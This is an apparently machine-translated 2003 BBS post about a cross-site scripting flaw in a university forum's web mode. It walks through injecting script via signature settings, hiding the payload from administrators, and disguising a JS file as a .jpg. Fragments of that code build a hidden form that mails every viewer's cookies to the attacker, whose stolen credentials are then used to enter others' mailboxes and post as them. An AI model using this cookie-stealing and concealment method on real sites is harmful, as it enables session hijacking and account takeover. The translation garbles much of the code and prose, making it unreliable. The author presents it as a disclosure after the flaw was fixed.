Unnamed BBS WWW a vulnerability utilization

xiaoxiao2021-03-06 39

WWW, unnamed BBS, a vulnerability (original)

Vulnerability discovery

We know that in telnet mode, we can set the picture signature file, set the format is: picture URL This will after you set it, when you post an article, in WWW mode, the corresponding web page The following HTML code is automatically generated: This principle believes that everyone will understand, but if you carefully scrutinize and play it, you will be unexpected effect: Imagine if your picture signature file This setting: > Any code So the corresponding HTML code in the page in your article in the WWW mode is: What will you realize now? That is, we can join any code in the unnamed BBS WWW mode (any code supported by the browser)!!! Let us give full play to our imagination to do what we want to play.

2. Use skills for vulnerabilities

Before we are ready to do it, you can do a simple test first: set the signature file to: "> Alert () then go to TEST board. This way, you will see the pop-up Alert () window when you click on your article. But soon, you will find two flaws: 1) Image signature files due to IMG SRC = "", can not find the path, therefore appear with fork, which may be careful. 2) If you look at your article under Telnet, you will find that your signature file is a lot of code, which will cause administrators' suspicion. Therefore, we must try to solve these problems: For the first question, you can set the signature file to: "style =" Display: none; "> Any code This picture is not Show out. For the second question, you can use the "obvision method", just set the signature file: a text signature file sufficiently long space "style =" Display: none; "> Any code So all work is done very hidden, we can have a boldly play.

3. A terrible util of vulnerability - text with others ID, enter others mailbox

Some people may use the code to make some evil or join some vicious code to meet some kind of purpose, but after all, these will not bring very serious consequences, and do not play much of your imagination. In fact, a more terrible attempt is, can you use the code to get the user's information ?!! My idea is to get the user with code (as long as this ID browsing your article with that piece of code under WWW) ) Cookies on the machine, there is a user's related information, and then use the user's information to send a letter to me (preferably my vest) in the mailbox, the content is the cookie. User information.

With this idea, it is not so difficult ("I only can't think of, I can't do it", huh, I am the whole process of my "crime": First, make a JS file, for the sake of concealment, will file Extended .jpg, such as AAA.jpg, as follows: Document.write (' </ iframe>); // Be a hidden iframe // ** ** Automatically send cookies to my vest majia mailbox, ********************************************************************* CONTENT = '<form id = fm method = post action = "/ cgi-bin / bbssdm"> "; content = '<input type = text name = to value =" majia ">'; //Convicor is MajiaContent = '<input type = radio name = Signature value = 1 checked > '; content =' <input type = text name = title value = "cookies"> '; content =' '; // below is to use the user's cookie information to get the user's sending power, and will Letter content set to its cookie // Description: The content of the user cookie is: code; ID name; encrypted identification code // Cookie: PID = 15325; ID2 = IDNAME; code2 = $ 1 $ umqhpank $ PBEO3U2LCHNJ48LGAMB7Y1 // Use the ID name and encrypted identification code to enter this ID or send a document with this ID (see) Content = '<textarea name = text value =' parent.Left.Document.cookie '> Parent le =; = =;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ************************************************************ CONTENT = '<script> fm.submit ( ); </ script> '; // Send sendit.document.write (content); then, in the TEST board, will top AAA.jpg (actually JS file) Paste into an attachment, remember its URL address. Then delete this article - but don't worry, the attachment is still there (I don't know if this is another vulnerability).</p> <p>Then, set the signature file under Telnet: a space for a text signature file for a long enough space <img> "style =" display: none; "> <script src =" URL address "> <q" / img>, I'm big! Below you can have a number of people with a number of people in people, it is best to have pictures attachments - so you can attract others to WWW to see your article. Then, bubble a cup of coffee, listen to music, how long, you will receive dozens or even hundreds of books (but repeat) others send them their own information in your mailbox. Method to enter others: First, make sure that the other party ID is on the line, then you click "Send Mail" under your own WWW, then view the original file, save it as mail.htm, then make some parameters in the Form The setting is OK, such as the relative path renamed absolute, and the corresponding value value is replaced with someone ID. Then use this mail.htm to send yourself, after sending the information, the browser window of mail.htm automatically switches to the other people's mailbox, so, ... use the method of the document by others, not Say more. 4. Special statement</p> <p>This vulnerability was discovered in the beginning of January this year. He did did the above test, but it was once again or oriented, and it quickly took it out after entering others, and did not make any damage to others. There is no record and disclosure. Anyone's privacy. After discovering this vulnerability, I promptly reported to the technical director, and now this vulnerability has been completely repaired, so I will open this article. Finally, I hope that unknown improvements will improve the WWW method as soon as possible. After all, the current small bug is too much.</p> <p>Originally published in: Sender: NEWEROICA (New Hero), News District: HomePage Title: Unnamed BBS WWW A Vulnerability Utilization (Original) Send Station: Peking University Unnamed Station (February 22, 2003 12:27 : 36 Saturday), station letter</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-51475.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="51475" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.033</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = '5JKtnUv1eT_2BQtZ8wSNVxoSAVJYMKT6FESDWzzzuL6NLa3_2BXoerbtNYBGrU0o1kdx3bPaFJ6vKyrNnJjfAomc8Q_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>